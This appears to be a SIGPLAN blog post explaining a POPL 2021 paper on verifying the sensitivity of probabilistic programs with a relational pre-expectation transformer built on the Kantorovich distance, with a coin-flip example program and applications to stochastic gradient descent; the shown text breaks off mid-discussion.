[ "# Methods for solving $x'=Ax+b$ for small, sparse, singular $A$\n\nI am in the process of building a robotics physics engine. I have been using the Linear ODE $x' = Ax + b$ for the core of my physics integration, but have never found a really good solution method for it.\n\nMy problem gets harder than the standard ODE solution because my A matrix is singular.\n\nHere is an example of an $A$ matrix and a $b$ matrix from my simulation:\n\n$$\\begin{vmatrix} 0 & 0 & 0.64 & 0 & 0.64 & 1.27 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 0 & 0 & -0.64 & 1.27 & 0 & 0 & 0 & 0.64 \\\\ 0 & 0 & -29.53 & 0 & -28.2 & -56.4 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 1.33 & -2.67 & 0 & 0 & 0 & 0 & 171.2 & -1.33 \\\\ 0 & 0 & 1.33 & 0 & 0 & 0 & 0 & 0 & 0 & -1.33 \\\\ 0 & 0 & 2.67 & 0 & 0 & 0 & 0 & 0 & 0 & 2.67 \\\\ 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 0 & 0 & 28.2 & -56.4 & 0 & 0 & 0 & -29.53 \\\\ \\end{vmatrix}$$\n\n$$\\begin{vmatrix} 0\\\\ 0\\\\ 9.76\\\\ 0\\\\ 171.2\\\\ 0\\\\ 0\\\\ 0\\\\ 0\\\\ -9.76\\\\ \\end{vmatrix}$$\n\nAccording to several previous questions, the solution to this ODE is the expression. $$x(t)=e^{At}y+\\int_0^t e^{As}b ds$$\n\nIn particular, the integral of this is the hard part. According to Wolfram Alpha, the solution is:\n\n$$\\int_0^t e^{As}b ds = \\frac{b(e^{At}-1)}A$$\n\nWhich is equivelant to the taylor series:\n\n$$bt + \\frac{1}2Abt^2 + \\frac{1}6A^2bt^3 + \\frac{1}{120}A^3bt^4 + ...$$\n\nMy current, inefficient solution relies on evaluating this taylor series. I cannot evaluate the solution directly, since I cannot invert A. I have tried using $A^+$, however this does not yield the correct solution.\n\nIs there a better solution to this problem? I am currently taking Calc II, and have attempted to teach myself the Linear Algebra necessary to build this software. Therefore I don't know of all the tricks that might be used to tame this problem.\n\nI am using the theano python library to perform these calculations, though if I can get a solution using scipy/numpy I can figure out how to do it in theano.\n\n• Have you tried using \"the\" 4th-order Runge-Kutta method (en.wikipedia.org/wiki/…)? You get a nice balance of accuracy for computational effort with this. It's an explicit method, so you only need to be able to do your matrix-vector product in order to use it. This method is included in pretty much any general ODE library (such as scipy.integrate.ode, as suggested by @Kirill). If you'd like to keep the external library dependency to a minimum, however, the basic method is exceedingly straightforward to implement yourself. – Tyler Olsen Mar 13 '16 at 19:26\n• From the point of view of numerical methods, this system is very easy to \"solve\". What is it you don't like about your current method -- is it too slow, not accurate enough, or something else? – David Ketcheson Mar 14 '16 at 5:07\n• Also, there is a typo in your Taylor series -- presumably it does not correspond to a typo in your code. – David Ketcheson Mar 14 '16 at 5:08\n• @DavidKetcheson Yes that was just a typo in the taylor series here. I do it correctly in my code. I dislike my current method because it is unstable -- some simulations require up to a hundred terms be computed before a decent answer is found, and this isn't guaranteed. 
– computer-whisperer Mar 14 '16 at 16:24\n\nIn general, computing the matrix exponential is a bit tricky — see \"Nineteen Dubious Ways\" by Moler, Van Loan, your truncated Taylor series approach is their Method 1. There is already a matrix exponential function in scipy, so you should prefer using that to a naive implementation. Truncated Taylor series wouldn't even work for a general $1\\times 1$ case because of numerical instability when $A<0$.\nI would also recommend against doing it this way due to the likely catastrophic cancellation in $A^{-1}(e^{At}-1)$ — this formula is inaccurate even for small scalar $A$ and is difficult to use even if you used an accurate matrix exponential, like scipy.linalg.expm.\nYour formula for the general solution $x(t)$ seems suspicious: Wolfram Alpha gave you an answer assuming that $A$ is a scalar number, which is the main reason that formula assumes $A$ is invertible and has the $b$ on the wrong side of the matrix." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7634951,"math_prob":0.9912042,"size":1975,"snap":"2019-43-2019-47","text_gpt3_token_len":761,"char_repetition_ratio":0.23592085,"word_repetition_ratio":0.3156733,"special_character_ratio":0.46481013,"punctuation_ratio":0.11235955,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98854244,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-15T15:31:09Z\",\"WARC-Record-ID\":\"<urn:uuid:aa75bc41-5d23-417f-be8e-0850999f8f3a>\",\"Content-Length\":\"141820\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3ec76577-ca3e-477a-95cb-4d96507a5657>\",\"WARC-Concurrent-To\":\"<urn:uuid:00b65823-0671-4e26-8891-9504cda67d3c>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://scicomp.stackexchange.com/questions/23354/methods-for-solving-x-axb-for-small-sparse-singular-a\",\"WARC-Payload-Digest\":\"sha1:I7LVKSUH2YXX2YJ2ROOCZPI4LEQ5RWHV\",\"WARC-Block-Digest\":\"sha1:RP3ALFXNFARXPJVUAP6RGDIVBCC64XLE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668682.16_warc_CC-MAIN-20191115144109-20191115172109-00160.warc.gz\"}"}
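The question above needs the integral of e^{As} b ds from 0 to t for a singular A, where the A⁻¹(e^{At} − 1) formula breaks down. One standard way around this (an assumption here; the thread itself only points to `scipy.linalg.expm` and general-purpose integrators) is the augmented-matrix trick: exponentiate the (n+1)×(n+1) block matrix [[A, b], [0, 0]]; its top-left block is e^{At} and its top-right column is exactly the integral, so no inverse of A is ever needed. The function name below is made up for illustration.

```python
import numpy as np
from scipy.linalg import expm

def step_linear_ode(A, b, x0, t):
    # Exact step of x' = A x + b, valid even for singular A:
    # expm(t * [[A, b], [0, 0]]) has e^{At} in the top-left block and
    # the integral of e^{As} b ds (s from 0 to t) in the top-right column.
    n = A.shape[0]
    M = np.zeros((n + 1, n + 1))
    M[:n, :n] = A
    M[:n, n] = b
    E = expm(M * t)
    return E[:n, :n] @ x0 + E[:n, n]

# Tiny singular example (not the 10x10 matrix from the question):
A = np.array([[0.0, 1.0], [0.0, 0.0]])
b = np.array([0.0, 2.0])
x0 = np.array([1.0, 0.0])
print(step_linear_ode(A, b, x0, 0.5))   # matches x1 = 1 + t**2, x2 = 2*t
```

As the comments in the thread note, a general-purpose Runge-Kutta integrator is an equally reasonable choice when an exact matrix-exponential step is not required.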
https://papers-gamma.link/paper/74/The%20Community-search%20Problem%20and%20How%20to%20Plan%20a%20Successful%20Cocktail%20Party
[ "", null, "", null, "Overall a very nice paper. Given a small set of query nodes, how can we find its community (a \"compact\" connected subgraph strongly related to the query nodes)? An optimization is formalized and an efficient optimal algorithm (inspired by the k-core decomposition) to solve the optimization is devised. Efficient heuristics are also suggested. The following points could be improved. ### Not clear examples of monotone functions: - \"Example 2 (Minimum degree) Let $f_m(G)$ be the minimum degree of any node in $G$. The function $f_m$ is monotone.\". That is not true: when removing nodes from a given graph, the minimum degree can increase and then decrease. - \"Example 3 (Distance) The functions $D_Q(G, v)$ and $D_Q(G)$, defined by Equations (1) and (2) are node-monotone and monotone, respectively.\" That is not true: \"$D_Q(G)$\" is not monotone: it can decrease and increase when removing nodes. In addition, with this definitions the query nodes should not be removed, this is not specified. - \"A lower bound on the number of nodes in a graph is monotone\". This is not clear. I think that what is meant is not that any function that is a lower bound on the number of nodes (e.g., $f(V)=|V|/2$) is monotone, but that requiring a lower bound on the number of nodes is monotone. - \"$M_Q(G)=\\max_{v\\in V(G)}\\{M_Q(G,v)\\}$ is monotone\". That is not true. - \"The number of disjoint paths between two nodes (which is a popular measure for friendship strength) is node-monotone non-increasing.\" This is not clear, the function should of the form $f_m(G,v)$, is $v$ one of the two nodes? - \"with a monotone function (such as maximum distance and minimum degree).\". It is not clear what \"maximum distance\" means. If it means \"the diameter of the graph\", then this function is not monotone as it can increase or decrease when removing nodes. - Note that only node-monotone functions are of interest for the suggested method and monotone functions are not used. \"Problem 3 (Cocktail party) We are given an undirected graph $G=(V, E)$, a node-monotone non-increasing function $f$, as well as a set of monotone non-increasing properties $f_1,...,f_k$. We seek to find an induced subgraph $H$ of $G$ that maximizes $f$ among all induced subgraphs of $G$ and satisfies $f_1,...,f_k$. A similar problem can be defined by considering to minimize monotone non-decreasing functions.\". In that problem \"monotone\" should be replaced by \"node-monotone\". ### Experiments: - \"We implemented our algorithms in Perl and all experiments run on a dual-core Opteron processor at 3GHz.\" The implementation does not seem to be publicly available. - I think that more informations on how to reconstruct the graphs on which the experiments are run could be given. Some of the datasets do not seem to be publically available. - In Table 1, I think that the first line is about the distance constraint. The number of query nodes and how they are picked does not seem to be specified. - As the experiments in Table 1, Figure 1 and Figure 2 are the results of an average, error bars could be given to see how significant the differences are. ### Implementation details and asymptotic complexity: - An asymptotic time complexity is not given. - Implementation details are lacking. In particular, it is not clear how to check that the query nodes are connected at each step. This does not seem to be so trivial. 
If a BFS has to be run everytime a node is deleted, then the algorithm would be in $\\Omega(n^2)$ and might be too slow for large graphs. ### Comparison against connectivity subgraph (reference , and ): \"Faloutsos et al. , Tong et al. , as well as other researchers have studied the problem of finding a subgraph that connects a set of query nodes in a graph. The main difference of our approach is that we are not just interested in connecting the query nodes, but also in finding a meaningful community of query nodes.\" To me \"community search\" is similar to \"connectivity subgraph\": if the upper bound on the number of nodes is small enough then indeed \"connectivity subgraph\" can be seen as \"just connecting the query nodes\". However, if this upper bound $k$ is higher, then the goal of \"connectivity subgraph\" is to find $k$ nodes connecting the query nodes and relevant to it, which is similar to the goal of \"community search\". I think that a comparison to the \"connectivity subgraph\" line of work can be carried. At least for the \"case study\" on the communities of Papadimitriou in DBLP. ### Node-monotone functions: Maybe defining a node-monotone function as a function $f(G,U,v)$ of the input graph $G=(V,E)$, a set of vertices $U\\subset V$ and a node $v\\in U$ is interesting. This would allow taking the outside of the induced subgraph on $U$ into account. As an example: the number of neighbors $v$ has in $U$ is node-monotone non-increasing, but the number of neighbors $v$ has in $V\\setminus U$ is node-monotone non-decreasing (this second function is hard to express with the definition of node-monotone function given in the paper). ### Typos: - \"Graphs is one of most ubiquitous data representations\" ->? \"Graphs are one of the most ubiquitous data representations\" - \"there is need for\" ->? \"there is a need for\" - \"It has been one of them most well-studied problems\" -> \"one of the most\" - \"Brunch and bound\" :) -> \"Branch and bound\" - \"in order to extracting informations\" -> \"in order to extract informations\" - \"divided by all possible possible edges\" - \"that are far way from\" ->? \"far away from\" - \"We start by present an optimal algorithm\" - \"$G_{T−1}$\": \"T\" -> \"t\". - \"we still assume that $d=|V|$\" -> \"$d=|V|^3$\" - \"Now are are ready\" - \"The dist ance\" - \", which we denote be $q=|Q|$\" - \"for the the heuristic\" - \"This reason is that\" -> \"The reason is that\" - \"with our heuristics This is shown in\": \".\" lacking. - \" we think that it is quite remarkable that GreedyDist finds subgraph average distance more than 5\" -> \"finds a subgraph of average degree more than 5\", and not \"distance\". - \"we can see from indeed\" - \"it belongs in\" ->? \"it belongs to\" - \"The aim is to find compact a community\" ->? \"The aim is to find a compact community\" - \"the situation is not so agreeable\" ->? \"the situation is not so pleasant\" - \"and it is densely connected\" ->? \"and is densely connected\"" ]
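The reviewer's claim above that the minimum degree can increase and then decrease as nodes are removed is easy to verify on a tiny example. The sketch below is plain Python with a hand-picked four-node graph (a triangle plus a pendant node); the graph is mine, not taken from the paper.

```python
# Check of the review's point: the minimum degree of an induced subgraph
# can first increase and then decrease as nodes are removed.
edges = {("a", "b"), ("a", "c"), ("b", "c"), ("a", "d")}  # triangle a-b-c plus pendant d

def min_degree(nodes):
    """Minimum degree in the subgraph induced by `nodes`."""
    deg = {v: 0 for v in nodes}
    for u, v in edges:
        if u in nodes and v in nodes:
            deg[u] += 1
            deg[v] += 1
    return min(deg.values())

print(min_degree({"a", "b", "c", "d"}))  # 1: pendant node d has degree 1
print(min_degree({"a", "b", "c"}))       # 2: removing d raises the minimum degree
print(min_degree({"b", "c"}))            # 1: removing a lowers it again
```

So the minimum degree is not monotone along a chain of induced subgraphs, which is the sense of the reviewer's objection to Example 2.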
[ null, "https://papers-gamma.link/static/img/tower.png", null, "https://papers-gamma.link/static/img/month.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.919637,"math_prob":0.9816465,"size":13405,"snap":"2023-14-2023-23","text_gpt3_token_len":3407,"char_repetition_ratio":0.13498993,"word_repetition_ratio":0.94681317,"special_character_ratio":0.26124582,"punctuation_ratio":0.10938108,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99668056,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-06T23:04:22Z\",\"WARC-Record-ID\":\"<urn:uuid:fb3e5d75-5296-44a4-af71-642998f3bc69>\",\"Content-Length\":\"32846\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ed9a8850-2b08-455b-b65b-6e173db10715>\",\"WARC-Concurrent-To\":\"<urn:uuid:04e152aa-a1b5-4dad-909f-1fda2ed77620>\",\"WARC-IP-Address\":\"168.119.120.52\",\"WARC-Target-URI\":\"https://papers-gamma.link/paper/74/The%20Community-search%20Problem%20and%20How%20to%20Plan%20a%20Successful%20Cocktail%20Party\",\"WARC-Payload-Digest\":\"sha1:PKQ7AXNQ26FAVR6U4Z7N6WIV7WXBSFAZ\",\"WARC-Block-Digest\":\"sha1:DM5FQYCRAE6ZCMACI4LPCXNSJPXOSGEL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224653183.5_warc_CC-MAIN-20230606214755-20230607004755-00619.warc.gz\"}"}
https://ebrary.net/182938/mathematics/sequential_estimation_strategy_mrpe_problem
[ "# Sequential Estimation Strategy for the MRPE Problem\n\nAgain, we begin with к-tuples (Х,д,..., Х,д), i = 1,2,..., шо(> 2), the pilot observation vectors. Then, we define the stopping time along the lines of Robbins (1959), Chow and Robbins (1965), Starr (1966b) and modify (11.26) as follows:", null, "with S2rk coming from (11.23) and 7(> 0) is an appropriate number to be made more specific shortly. This Rkc estimates r'k from (11.20).\n\nWe continue to check the condition for boundary crossing in (11.41) successively with the updated pairs (r, Sr/k) at instances r = mo, mo + 1,... and then stop when r first crosses the corresponding boundary (A/c)^2(S,_t + г-7).The sampling strategy from (11.41) terminates w.p. 1, that is, Pi{Rk,c < oo} = 1. Having terminated sampling with the finally accrued data,", null, "## Asymptotic First-Order Results\n\nAs c -t 0, a number of asymptotic first-order properties associated with the estimation strategy (Ra-(1-, Gj?tjt) from (11.41)—(11.42) can be summarized as follows:", null, "Again, the expression of rk comes from (11.20).\n\nThese properties will again customarily follow from Chow and Robbins (1965). One may also supply direct proofs of both parts from what is called the basic inequality. The second part in (11.43) may combine the first part, Fatou's Lemma, along with the result: Ер[Р*,с] < n* + 0(1). Else, one may follow along the steps we showed in (11.29) and improvise suitably as needed.\n\nUnder the loss function (11.18), the sequential risk function associated with the sequential MRPE strategy (R^, Gliiik) from (11.41)—(11.42) is described as:", null, "In order to compare the performances of the MRPE strategy with the optimal fixed rk-strategy, even though this optimal fixed r£ -strategy is not implementable, Robbins (1959) defined the following metrics:", null, "Robbins (1959) defined a sequential MRPE strategy asymptotically risk efficient if the following limiting result holds: liny.^o ip(c) = 1. Ghosh and Mukhopadhyay (1981) named this property as asymptotically first-order risk efficient.\n\nOur proposed point estimator of Gf is clearly a sample mean of i.i.d. random variables Gijt, G2,k, ■ ■ • where we do not assume a specific common distribution which make this problem fall under the broad umbrella of sequential nonparametric point estimation scenarios. The sequential MRPE problem of estimating a population mean by a sample mean of i.i.d. random variables was first developed by Mukhopadhyay (1978). Ghosh and Mukhopadhyay (1979, Theorem 1) followed quickly and shaped the theory more fully by proving the following results as c —t 0:", null, "where rk comes from (11.20).\n\n## Asymptotic Second-Order Results: A Brief Outline\n\nIn Ghosh and Mukhopadhyay's (1979) original distribution-free paper, they assumed high moment conditions which were later reduced substantially to a more acceptable level by Chow and Yu (1981) under weighted SEL loss plus linear cost while estimating a population mean. Sen and Ghosh (1981) had built an elegant theory for asymptotically risk efficient sequential estimation for the mean of a U-statistic under economical moment conditions. 
While estimating a population mean under SEL (or weighted SEL) plus linear cost, Chow and Martinsek (1982) and Martinsek (1983) came up with asymptotically sharp second-order results for the associated regret function from (11.45), ω(c), under appropriate moment conditions.\n\nWe can immediately claim such asymptotic first-order and second-order results associated with our sequential MRPE strategy (R_{k,c}, Ḡ_{R_{k,c},k}) from (11.41)–(11.42), but we require no special moment condition because E_f[(G_{1,k})^p] < ∞ for all fixed p (> 0) since G_{1,k} has a finite support, namely (0,1). We surely realize that E_f[G_{1,k}] = G_f + c_f, where the convergence of the remainder term c_f to 0 will be fast enough so that our MRPE problem for G_f can be reduced to a MRPE problem for a population mean since k is large but held fixed.\n\nMore precisely, however, from Chow and Martinsek's (1982) and Martinsek's (1983) results, the following conclusions will follow for a mildly modified version of the original stopping rule R_{k,c} from (11.41) which would be laid down as follows:", null, "with the pilot size satisfying δc^{-1/4} ≤ r_c = o(c^{-1/2}) for some δ > 0.\n\nTheorem 11.1. For the sequential MRPE strategy (R_{k,c}, Ḡ_{R_{k,c},k}) associated with (11.47), we have the following asymptotic second-order regret expansion as c → 0:", null, "with σ_f^2, ξ_f, ω(c) coming from (11.11), (11.12) and (11.45) respectively, where σ_f^2 ≈ k^{-1}ξ_f for large but fixed k.\n\nThe next result follows from Chang and Hsiung (1979), also incorporated in Martinsek (1983).\n\nTheorem 11.2. For the sequential MRPE strategy (R_{k,c}, Ḡ_{R_{k,c},k}) associated with (11.47), we have the following asymptotic second-order efficiency result as c → 0:", null, "with r*_k coming from (11.20) for large but fixed k. An expression of d, free from c, comes from Martinsek (1983, p. 832).\n\nThese second-order results (Theorems 11.1–11.2) are very interesting, especially since we fully expect the stopping time R_{k,c} from (11.41) and the modified rule from (11.47) to be asymptotically indistinguishable from one another. Now, in the spirit of Section 11.3.3 and assumption (11.33), we may presume (for large k) that the G_{i,k}'s are practically N(G_f, σ_f^2), and then clearly we would have E_f[((G_{1,k} - G_f)^2 - σ_f^2)^2] ≈ 2σ_f^4 and E_f[(G_{1,k} - G_f)^3] ≈ 0.\n\nUnder this scenario, from Theorem 11.1, we will conclude (as c → 0):", null, "which coincides with the regret expansion from Woodroofe (1977) in the normal case.\n\nNow, one can readily see the marked difference between the technicalities developed by Chattopadhyay and De (2014, 2016), De and Chattopadhyay (2017) and those that we have developed in this paper. Our present construction of sequential MRPE strategies is broad enough to deliver even the associated asymptotic second-order approximations." ]
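The purely sequential scheme described above can be mimicked in a few lines. The exact boundary in (11.41) sits in an equation image that is not reproduced here, so the sketch below uses the generic Robbins-type boundary stated in the prose, r >= sqrt(A/c) * (S_r + r^(-gamma)), with ordinary normal data and invented constants in place of the G_{i,k}'s and of S_{r,k} from (11.23). It only illustrates the mechanics of boundary crossing, not the book's exact procedure.

```python
# Schematic purely sequential stopping rule of the Robbins type described in the text:
# keep sampling until r >= sqrt(A / c) * (S_r + r**(-gamma)), then report the sample mean.
# A, c, gamma, m0 and the N(0.5, 1) data are illustrative assumptions, not book values.
import numpy as np

rng = np.random.default_rng(0)

def sequential_mean(A=100.0, c=0.01, gamma=0.5, m0=10):
    sample = list(rng.normal(loc=0.5, scale=1.0, size=m0))   # pilot observations
    r = m0
    while r < np.sqrt(A / c) * (np.std(sample, ddof=1) + r ** (-gamma)):
        sample.append(rng.normal(loc=0.5, scale=1.0))         # take one more observation
        r += 1
    return r, float(np.mean(sample))

stop_time, estimate = sequential_mean()
print(stop_time, estimate)
# With these constants the optimal fixed size is roughly sqrt(A/c) * sigma = 100,
# and the rule stops slightly above it because of the r**(-gamma) safeguard term.
```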
[ null, "https://ebrary.net/htm/img/33/1886/481.png", null, "https://ebrary.net/htm/img/33/1886/482.png", null, "https://ebrary.net/htm/img/33/1886/483.png", null, "https://ebrary.net/htm/img/33/1886/484.png", null, "https://ebrary.net/htm/img/33/1886/485.png", null, "https://ebrary.net/htm/img/33/1886/486.png", null, "https://ebrary.net/htm/img/33/1886/487.png", null, "https://ebrary.net/htm/img/33/1886/488.png", null, "https://ebrary.net/htm/img/33/1886/489.png", null, "https://ebrary.net/htm/img/33/1886/490.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8904157,"math_prob":0.96350604,"size":5772,"snap":"2023-14-2023-23","text_gpt3_token_len":1528,"char_repetition_ratio":0.12517338,"word_repetition_ratio":0.015317286,"special_character_ratio":0.27772003,"punctuation_ratio":0.14592275,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9809648,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-30T23:31:49Z\",\"WARC-Record-ID\":\"<urn:uuid:3861db36-0ace-431a-a039-c6ab08bb6c31>\",\"Content-Length\":\"36092\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:726f64ea-ecdd-45b9-8dd6-e1afc870c138>\",\"WARC-Concurrent-To\":\"<urn:uuid:780921bf-2394-44ce-9d31-d189b2479d72>\",\"WARC-IP-Address\":\"5.45.72.163\",\"WARC-Target-URI\":\"https://ebrary.net/182938/mathematics/sequential_estimation_strategy_mrpe_problem\",\"WARC-Payload-Digest\":\"sha1:4WJYOMVFB7HTTGLLGHOHIQBUDQIQNITK\",\"WARC-Block-Digest\":\"sha1:7GXOZN4LRDUQIWNHGYZMPI7HGANDFE6X\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949506.62_warc_CC-MAIN-20230330225648-20230331015648-00186.warc.gz\"}"}
https://blog.sigplan.org/2021/07/15/a-pre-expectation-calculus-for-probabilistic-sensitivity/
[ "Select Page\n\n# PL Perspectives\n\nPerspectives on computing and technology from and for those with an interest in programming languages.\n\nProbabilistic programs are ubiquitous in modern computing, with applications such as randomized algorithms, machine learning and statistical modelling. Techniques and principles to formally verify classical (deterministic) programs often fail in counterintuitive ways when applied directly to probabilistic programs. This motivates the need for specialized techniques to reason about these programs.\n\nRelational program properties, as opposed to classical properties, refer to pairs of executions of a program. Sensitivity properties are a particular class of relational properties. Sensitivity answers a very natural question: if I make a small change to the input of my program, how much can the output change? Sensitivity properties can be defined by choosing a distance", null, "$d_I$ over the input space and a distance", null, "$d_O$ over the output space such that the program, such that for any pair of inputs", null, "$i_1, i_2$ and their respective outputs", null, "$o_1, o_2$ we have", null, "$d_O(o_1,o_2) \\leq d_I(i_1,i_2)$.\n\nOur distinguished POPL 2021 paper, A Pre-expectation Calculus for Probabilistic Sensitivity explores the problem of reasoning about the sensitivity of probabilistic programs, whose behavior may depend on randomly sampled variables, and therefore their observable output defines a probability distribution over final states. In this post we will first begin by justifying the notion of sensitivity we use, then discuss how we reason about it and finally conclude by presenting some applications.\n\n# Notions of probabilistic sensitivity\n\nWhile it is clear how to define sensitivity for deterministic programs, defining it for probabilistic programs takes more care. As is traditional in probabilistic program semantics, we can model the output of a probabilistic program as a probability distribution. Then, sensitivity properties can be expressed with respect to a distance between probability distributions. However, in practice there are several probabilistic distances that are used.\n\nConsider for instance the following program:\n\nint foo(p):\nx = 0;\nt = 0;\nwhile (t < T){\nb = flip(p);\nx = x + b;\nt = t + 1;\n}\nreturn x;\n\n\nThis program samples a random bit T times and counts the total number of 1s. The probabilistic behavior is induced by the command flip(p), which returns 1 with probability p and 0 with probability 1-p. We are interested in studying the sensitivity of the output x with respect to the parameter p. For simplicity, we assume that the number of iterations T is a global constant.\n\nRecall that a discrete probability distribution over a countable set", null, "$X$ is a function", null, "$f \\colon X \\to [0,1]$ such that", null, "$\\sum_{x\\in X} f(x) = 1$. For our program we could define sensitivity using for instance the following distances:\n\n• Total Variation distance, or TV distance. Given two distributions, the TV distance measures how much the probability of any event can differ between them. It is defined by the sum below:", null, "$TV(f_1,f_2) = \\frac{1}{2} \\sum_{ x \\in X} | f_1(x) - f_2(x) |$\n\nThe TV distance can be defined on every output space", null, "$X$, since the structure of", null, "$X$ is not used in the definition. As a downside, it is often complicated to compute the exact TV distance, since one needs to evaluate the sum above.\n\n• Absolute expected difference. 
For programs with numeric output, as our example, sensitivity can also be defined from the absolute difference between the expected outputs:", null, "$AED(f_1,f_2) = |\\sum_{ x \\in X} x \\cdot (f_1(x)-f_2(x)) |$\n\n(Note: This is actually not a distance, it is a pseudodistance, but it also can be used to define sensitivity). For instance, in the example above, the absolute expected difference between the outputs of foo(p1) and foo(p2) is T * |p1 - p2|, since the loop runs T times, and the probability of increasing the counter is p1 on the first run and p2 on the second. For a more general output space", null, "$X$, we may want to reason about the absolute difference between the expected values of a function", null, "$g: X \\to [0,\\infty]$ on the two output distributions of the programs. These families of distances are used for instance to define stability of machine learning algorithms (see below).\n\nWhile sensitivity properties for probabilistic programs are defined in various manners, it would not be convenient to have different methods to verify different notions of sensitivity. Instead, we would like to have a more general notion of distance that we can reason about, and that can then be instantiated to particular distances between probability distributions.\n\n# The Kantorovich distance\n\nWith the goal of generality in mind, we develop a framework to reason about a distance known as the Kantorovich distance (sometimes also referred to as the Wasserstein distance). This distance constitutes a canonical lifting from a base distance", null, "$d \\colon X \\times X \\to [0,\\infty]$ to a distance", null, "$K(d): {\\rm Distr(X)}\\times {\\rm Distr}(X) \\to [0,\\infty]$, where", null, "${\\rm Distr}(X)$ denotes the space of discrete probability distributions over", null, "$X$.\n\nThe definition of the Kantorovich distance is somewhat technical, so instead we give an intuition and explain how it can be used. The Kantorovich distance is sometimes known as the earth-mover distance: if we visualize a probability distribution", null, "$f$ by placing a pile of sand of size", null, "$f(x_1)$ on top of each point", null, "$x_1$, then", null, "$K(d)(f_1,f_2)$ corresponds to the cost of the optimal way of transforming", null, "$f_1$ into", null, "$f_2$ by moving sand, where the cost of moving", null, "$a$ units of sand from", null, "$x_1$ to", null, "$x_2$ is", null, "$a \\cdot d(x_1,x_2)$.\n\nThe Kantorovich distance is fairly versatile. For example, the TV distance can be reconstructed as a particular case of the Kantorovich distance built from the discrete distance, which assigns a distance of 1 to all pairs of distinct points. And while in general it is not possible to define a distance on the base space that lifts to the absolute expected difference, the Kantorovich distance built from", null, "$d(x_1,x_2) = |g(x_1) - g(x_2)|$ provides an upper bound on the absolute expected difference defined from", null, "$g$. Moreover, in the degenerate case of distributions that assign all their mass to a single point, the Kantorovich distance", null, "$K(d)$ coincides with", null, "$d$. This allows us to cast sensitivity properties of deterministic programs as particular cases of sensitivity of probabilistic programs.\n\n# A relational pre-expectation transformer\n\nSensitivity is not only a relational property, but it is also a quantitative property. There is already significant previous work in verifying quantitative properties of probabilistic programs. 
The most related to our framework is the work on weakest pre-expectations by Morgan and McIver, which uses a predicate transformer to compute the expected value of some real-valued function", null, "$f$ (called an expectation) over the output distribution of an imperative probabilistic program", null, "$C$. This transformer can be seen as a quantitative generalization of Dijkstra’s weakest precondition transformer.\n\nThe initial observation behind our work is that predicate transformers can also be generalized to reason about sensitivity of probabilistic programs using the Kantorovich distance. More precisely, we can construct a transformer that receives as an input a distance", null, "$d$ and an imperative probabilistic program", null, "$C$ and two initial memories and it provides an upper bound of the Kantorovich distance", null, "$K(d)$ between the two output distributions of", null, "$C$.\n\nLet us be more formal. A relational expectation is a map", null, "$E \\colon M \\times M \\to [0,\\infty]$ from pairs of memories to the positive reals (note that distances are particular cases of relational expectations). In our paper we introduce a novel relational pre-expectation transformer,", null, "${\\rm rpe}$. It receives a program", null, "$C$, and a relational expectation", null, "$d$, and it returns a relational expectation", null, "${\\rm rpe}(C,d)$ such that, for any pair of input memories", null, "$m_1,m_2$, it satisfies the inequality", null, "$K(d)(C(m_1),C(m_2)) \\leq {\\rm rpe}(C,d)(m_1,m_2)$, where", null, "$C$ on the left side is interpreted as a map", null, "$C \\colon M \\to {\\rm Distr}(M)$.\n\nThis transformer is a direct analogue of other predicate transformers. It is defined by induction on the structure of the program, i.e., we define", null, "${\\rm rpe}(C,d)$ for every atomic command", null, "$C$, and for composition we have", null, "${\\rm rpe}(C_1; C_2, e) = {\\rm rpe}(C_1,{\\rm rpe}(C_2,e))$ . The", null, "${\\rm rpe}$ for a while loop is defined by a fixed point equation and can be approximated by using a generalized notion of invariants.\n\nAs with other transformers, such as the weakest pre-expectation or the expected runtime transformer, most of the explicit reasoning about probabilities is abstracted away, and is only needed for sampling commands. By choosing an appropriate distance", null, "$d$ between memories, our transformer can be used to reason about several notions of probabilistic sensitivity.\n\nFinally, readers may have noticed that we have not claimed anything about the precision of the sensitivity bounds our transformer computes. Indeed,", null, "${\\rm rpe}(C,f)$ does not always provide the tightest bound possible. This is due to some technicalities about the way the Kantorovich distance composes. Nonetheless, we have not observed significant gaps in practice between our analysis and other analyses of probabilistic sensitivity.\n\n# Applications: Stability of stochastic gradient descent and convergence of Markov chains\n\nOne of the core algorithms in machine learning is the gradient descent algorithm. This algorithm uses a data set of labelled examples to train a classifier to label new, unseen examples. The classical deterministic algorithm iterates over all examples in the training set and adjusts the parameters of the classifier so that they minimize a loss function, which measures how good the classifier is at labeling examples. 
